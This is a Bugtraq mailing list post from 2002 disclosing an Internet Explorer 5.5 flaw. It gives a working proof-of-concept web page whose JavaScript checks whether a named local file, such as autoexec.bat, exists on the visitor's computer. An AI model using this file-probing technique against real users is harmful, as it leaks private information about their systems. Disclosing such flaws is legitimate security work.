Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Serious IE privacy issues

From: Tom Micklovitch <h_bugtraq () yahoo com>
Date: Thu, 3 Jan 2002 04:08:31 -0800 (PST)
In addition to "Minor IE System Info Disclosure"
(Nov 4 2001) I've found that you can further poll
a system for ANY file, provided you know it's
path. Use the following script:
<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
        alert("the file exists.");
        yes = true;
}

function no()
{
        if(!fileExists)
        {
        alert("the file does not exist.");
        }
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

this will cause an alert "yes" if it exists, and
alert "no" if not.

Reason being is that autoexec.bat does not
contain any valid javascript commands, so the
onerror event is fired. Any non-existant file
will not generate an error, so the onload event
fires.

Tested with IE5.5

Still could do with some tweaking.

-User24 (freetimers.com)

__________________________________________________
Do You Yahoo!?
Send your FREE holiday greetings online!
http://greetings.yahoo.com
Previous By Date Next
Previous By Thread Next

Current thread: